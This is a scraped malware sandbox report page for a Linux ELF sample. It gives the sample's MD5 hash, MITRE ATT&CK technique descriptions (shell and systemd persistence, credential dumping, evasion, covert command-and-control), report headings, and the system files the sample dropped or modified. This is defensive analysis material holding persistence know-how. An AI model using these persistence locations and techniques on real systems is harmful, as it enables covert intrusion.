MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report x86_32.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/sh

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/run/user/127/dconf/user

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: x86_32.nn.elf PID: 6232, Parent PID: 6157

General

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6241, Parent PID: 6232

General

Chronological Activities

Analysis Process: x86_32.nn.elf PID: 6242, Parent PID: 6232

General

Chronological Activities

Linux Analysis Report
x86_32.nn.elf